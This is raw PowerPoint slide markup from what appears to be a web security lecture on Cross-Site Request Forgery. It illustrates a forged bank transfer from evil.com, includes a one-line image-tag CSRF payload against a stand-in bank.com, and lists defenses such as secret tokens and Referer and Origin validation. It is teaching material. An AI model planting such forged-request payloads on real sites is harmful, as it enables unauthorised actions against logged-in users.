            </a:duotone>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="411702" y="1905000"/>
            <a:ext cx="1102102" cy="1102102"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4526208" y="1219723"/>
            <a:ext cx="3047116" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Authenticates with bank.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="18" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3353242" y="1867319"/>
            <a:ext cx="3580958" cy="86972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a:duotone>
              <a:schemeClr val="accent5">
                <a:shade val="45000"/>
                <a:satMod val="135000"/>
              </a:schemeClr>
              <a:prstClr val="white"/>
            </a:duotone>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6281975" y="2813877"/>
            <a:ext cx="597330" cy="607454"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="22" name="Straight Arrow Connector 21"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3192400" y="2367707"/>
            <a:ext cx="3733800" cy="838200"/>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385588" y="2867589"/>
            <a:ext cx="4086824" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>transfer?amount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=500&amp;dest=grandson</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6316341" y="5244601"/>
            <a:ext cx="2751459" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cookie checks out! </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sending $500 to grandson</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="175581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1.94444E-6 3.7037E-7 L 1.94444E-6 0.00023 C -0.00504 -0.00116 -0.00972 -0.00185 -0.01441 -0.00278 C -0.02552 -0.00532 -0.01042 -0.00324 -0.02413 -0.00556 C -0.02761 -0.00602 -0.0309 -0.00602 -0.03403 -0.00671 C -0.05816 -0.01134 -0.03195 -0.0081 -0.05816 -0.01065 L -0.09896 -0.01852 C -0.09896 -0.01829 -0.12743 -0.02384 -0.12743 -0.02361 L -0.13872 -0.02523 C -0.14306 -0.02639 -0.14705 -0.02824 -0.15156 -0.02917 C -0.16354 -0.03218 -0.16858 -0.03218 -0.18125 -0.0331 C -0.18542 -0.03403 -0.18976 -0.03449 -0.19393 -0.03565 C -0.2033 -0.03819 -0.2125 -0.04167 -0.22205 -0.04352 C -0.22639 -0.04468 -0.23056 -0.04491 -0.2349 -0.0463 C -0.2382 -0.04722 -0.24097 -0.04954 -0.24462 -0.05023 C -0.25313 -0.05139 -0.26163 -0.05093 -0.27014 -0.05139 C -0.28785 -0.05556 -0.26597 -0.05046 -0.28021 -0.05417 C -0.28195 -0.05463 -0.28386 -0.05486 -0.28577 -0.05532 C -0.28715 -0.05579 -0.28854 -0.05648 -0.29011 -0.05694 C -0.29636 -0.05833 -0.31389 -0.0625 -0.32101 -0.06319 L -0.33229 -0.06482 C -0.35799 -0.07269 -0.32604 -0.06319 -0.34792 -0.06875 C -0.35087 -0.06921 -0.35365 -0.07037 -0.35643 -0.0713 C -0.3592 -0.07199 -0.36181 -0.07338 -0.36493 -0.07384 L -0.37205 -0.07523 C -0.37379 -0.07593 -0.37552 -0.07732 -0.37761 -0.07778 C -0.38143 -0.0787 -0.38524 -0.07847 -0.38906 -0.07917 C -0.39028 -0.0794 -0.39167 -0.08009 -0.39323 -0.08056 C -0.39584 -0.08102 -0.39879 -0.08125 -0.40174 -0.08171 C -0.40469 -0.08241 -0.40729 -0.08357 -0.41024 -0.08449 C -0.41146 -0.08495 -0.41285 -0.08542 -0.41441 -0.08565 C -0.41615 -0.08611 -0.41823 -0.08657 -0.41997 -0.08704 C -0.44097 -0.09306 -0.4257 -0.08935 -0.43837 -0.09236 C -0.43993 -0.09329 -0.44097 -0.09421 -0.44254 -0.09491 C -0.44549 -0.09607 -0.44844 -0.09676 -0.45104 -0.09769 L -0.46389 -0.10162 L -0.47222 -0.10417 C -0.47379 -0.10463 -0.47518 -0.10556 -0.47656 -0.10556 L -0.47952 -0.10556 L -0.48629 -0.10787 " pathEditMode="relative" rAng="0" ptsTypes="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="19"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-24323" y="-5394"/>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48629 -0.10787 L -0.00295 0.05417 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="19"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="24167" y="8102"/>
                                    </p:animMotion>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46</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7036703" y="2759778"/>
            <a:ext cx="1240078" cy="1785712"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1180914" y="990600"/>
            <a:ext cx="1905372" cy="1109097"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:duotone>
              <a:schemeClr val="accent1">
                <a:shade val="45000"/>
                <a:satMod val="135000"/>
              </a:schemeClr>
              <a:prstClr val="white"/>
            </a:duotone>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1946065" y="5189024"/>
            <a:ext cx="1219200" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:duotone>
              <a:schemeClr val="accent5">
                <a:shade val="45000"/>
                <a:satMod val="135000"/>
              </a:schemeClr>
              <a:prstClr val="white"/>
            </a:duotone>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7837024" y="4105220"/>
            <a:ext cx="1102102" cy="1102102"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="4206486"/>
            <a:ext cx="1240078" cy="1785712"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7004899" y="2367707"/>
            <a:ext cx="1136850" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>bank.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1132044" y="3736836"/>
            <a:ext cx="1001556" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>evil.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Picture 15"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:duotone>
              <a:schemeClr val="accent5">
                <a:shade val="45000"/>
                <a:satMod val="135000"/>
              </a:schemeClr>
              <a:prstClr val="white"/>
            </a:duotone>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="411702" y="1905000"/>
            <a:ext cx="1102102" cy="1102102"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Picture 18"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7">
            <a:duotone>
              <a:schemeClr val="accent5">
                <a:shade val="45000"/>
                <a:satMod val="135000"/>
              </a:schemeClr>
              <a:prstClr val="white"/>
            </a:duotone>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3153542" y="937694"/>
            <a:ext cx="597330" cy="607454"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4168074" y="1432205"/>
            <a:ext cx="4220001" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>transfer?amount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=10000&amp;dest=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>evilcorp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6139064" y="5287310"/>
            <a:ext cx="2932085" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cookie checks out! </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sending $10000 to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>EvilCorp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="3" name="Straight Arrow Connector 2"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905000" y="2286000"/>
            <a:ext cx="0" cy="1334308"/>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239004" y="2286000"/>
            <a:ext cx="0" cy="1330702"/>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296197" y="2904045"/>
            <a:ext cx="4112023" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>img</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src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=“http://bank.com/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>transfer?amount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=10000&amp;id=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>evilcorp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>”&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="25" name="Straight Arrow Connector 24"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3384951" y="1820176"/>
            <a:ext cx="3549249" cy="1186926"/>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2555665" y="4206486"/>
            <a:ext cx="4073735" cy="594114"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:pr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199941" y="4625480"/>
            <a:ext cx="942887" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>$10000</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="32" name="Picture 31"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8">
            <a:duotone>
              <a:schemeClr val="accent5">
                <a:shade val="45000"/>
                <a:satMod val="135000"/>
              </a:schemeClr>
              <a:prstClr val="white"/>
            </a:duotone>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="331503" y="1831676"/>
            <a:ext cx="1237500" cy="1248750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="68979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2.22222E-6 -5.55556E-6 L 2.22222E-6 -5.55556E-6 C 0.01771 0.0118 0.00191 -0.00024 0.01302 0.01157 C 0.02083 0.0199 0.01823 0.0155 0.02621 0.02175 C 0.02969 0.02453 0.03264 0.02823 0.03611 0.03055 C 0.03889 0.03263 0.04219 0.03333 0.04496 0.03495 C 0.04618 0.03587 0.04705 0.03726 0.04826 0.03796 C 0.05 0.03911 0.05191 0.03981 0.05382 0.04097 C 0.06111 0.04513 0.06857 0.0493 0.07569 0.05416 C 0.08316 0.05902 0.08906 0.06319 0.0967 0.06736 C 0.09878 0.06851 0.10104 0.06898 0.1033 0.07013 C 0.11094 0.0743 0.11823 0.08009 0.12621 0.08333 C 0.13003 0.08495 0.13368 0.08611 0.13732 0.08773 C 0.14062 0.08935 0.14392 0.09189 0.14722 0.09374 C 0.15 0.09513 0.15312 0.09629 0.1559 0.09814 C 0.15816 0.0993 0.16024 0.10138 0.1625 0.10254 C 0.16962 0.10578 0.16597 0.10208 0.17135 0.10532 C 0.19479 0.11967 0.17048 0.10624 0.19219 0.11851 C 0.1941 0.11967 0.19583 0.12083 0.19774 0.12152 C 0.20642 0.12499 0.2 0.12106 0.20764 0.1243 C 0.21059 0.12569 0.21354 0.12754 0.21649 0.1287 C 0.23611 0.13796 0.23073 0.13587 0.24496 0.1405 C 0.24601 0.14143 0.24705 0.14259 0.24826 0.14351 C 0.25 0.14467 0.25191 0.1456 0.25382 0.14629 C 0.2592 0.14884 0.26476 0.15115 0.27031 0.1537 L 0.27691 0.15671 C 0.27795 0.15717 0.27899 0.15763 0.28021 0.1581 C 0.2816 0.15856 0.28316 0.15879 0.28455 0.15948 C 0.28455 0.15948 0.29548 0.16689 0.29774 0.16828 C 0.29913 0.16944 0.30052 0.1706 0.30208 0.17129 C 0.30434 0.17222 0.3066 0.17314 0.30868 0.1743 C 0.31302 0.17638 0.31371 0.17708 0.31753 0.1787 C 0.31892 0.17916 0.32048 0.17962 0.32187 0.18009 C 0.32378 0.18148 0.32552 0.1831 0.32743 0.18448 C 0.32917 0.18564 0.33125 0.18611 0.33298 0.18749 C 0.33455 0.18865 0.33576 0.1905 0.33732 0.19189 C 0.33837 0.19259 0.33958 0.19259 0.34062 0.19328 C 0.34219 0.19421 0.34357 0.19513 0.34496 0.19629 C 0.34618 0.19768 0.34705 0.1993 0.34826 0.20069 C 0.34982 0.20231 0.35625 0.20717 0.35712 0.20786 C 0.35816 0.20879 0.3592 0.20995 0.36042 0.21087 C 0.3618 0.21203 0.36337 0.21296 0.36476 0.21388 C 0.36927 0.2162 0.36701 0.21365 0.36927 0.21666 L 0.36927 0.21828 " pathEditMode="relative" ptsTypes="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="19"/>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0" grpId="0"/>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Site Request Forgery (CSRF)</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i="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CSRF attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>causes the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>end </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>user browser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to execute unwanted actions on a web application in which </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>it </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is currently authenticated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a: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47</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1960781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CSRF Defenses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86019" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Secret Validation Token</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t> Validation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Origin Validation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86020" name="Text Box 5"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="86032" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3354387" y="2210583"/>
            <a:ext cx="5405438" cy="457200"/>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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>&lt;input type=hidden value=23a3af01b&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="86025" name="Picture 16"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
